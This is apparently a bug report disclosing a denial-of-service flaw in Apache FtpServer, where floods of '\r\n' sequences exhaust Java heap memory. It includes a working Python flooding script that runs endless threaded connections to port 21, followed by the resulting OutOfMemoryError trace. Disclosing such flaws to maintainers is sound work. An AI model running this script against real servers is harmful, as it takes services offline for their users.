Details
Major Description
Hi, I found the memory of FtpServer can be easily filled up with a lot of "\r\n" sequences. It shows that sending a long sequence with a lot of "\r\n" to the server can easily make the server's java heap space out of memory and make the server unavailable. It seems there is an issue in the memory control and command process. This may be a threat and exploited by attackers to do the Dos attack.
A similar threat can refer to CVE-2017-7651https://bugs.eclipse.org/bugs/show_bug.cgi?id=529754
Note that simply send the server a long senquence with casual characters except "\r\n" can not cause the same worse condition.
Attack simulation
run server
bin/ftpd.sh
run attack script
the attack script (in python) may seem like
import socket import threading import time ip_address = "0.0.0.0" port = 21 payload = b"\r\n"*1000000 # work #payload = b"aa"*1000000 # not work def send_attack(): soc = socket.socket(socket.AF_INET,socket.SOCK_STREAM) soc.connect((ip_address,port)) soc.sendall(payload) soc.close() while(True): for i in range(50): t = threading.Thread(target=send_attack) t.setDaemon(True) t.start() time.sleep(1)
Result
the server becomes unavailable and output information
Exception in thread "pool-1-thread-39" java.lang.OutOfMemoryError: Java heap space at java.nio.HeapByteBuffer.<init>(HeapByteBuffer.java:57) at java.nio.ByteBuffer.allocate(ByteBuffer.java:335) at org.apache.mina.core.buffer.SimpleBufferAllocator.allocateNioBuffer(SimpleBufferAllocator.java:42) at org.apache.mina.core.buffer.SimpleBufferAllocator.allocate(SimpleBufferAllocator.java:34) at org.apache.mina.core.buffer.IoBuffer.allocate(IoBuffer.java:235) at org.apache.mina.core.buffer.IoBuffer.allocate(IoBuffer.java:218) at org.apache.mina.core.polling.AbstractPollingIoProcessor.read(AbstractPollingIoProcessor.java:508) at org.apache.mina.core.polling.AbstractPollingIoProcessor.access$1200(AbstractPollingIoProcessor.java:68) at org.apache.mina.core.polling.AbstractPollingIoProcessor$Processor.process(AbstractPollingIoProcessor.java:1224) at org.apache.mina.core.polling.AbstractPollingIoProcessor$Processor.process(AbstractPollingIoProcessor.java:1213) at org.apache.mina.core.polling.AbstractPollingIoProcessor$Processor.run(AbstractPollingIoProcessor.java:683) at org.apache.mina.util.NamePreservingRunnable.run(NamePreservingRunnable.java:64) at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149) at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624) at java.lang.Thread.run(Thread.java:750)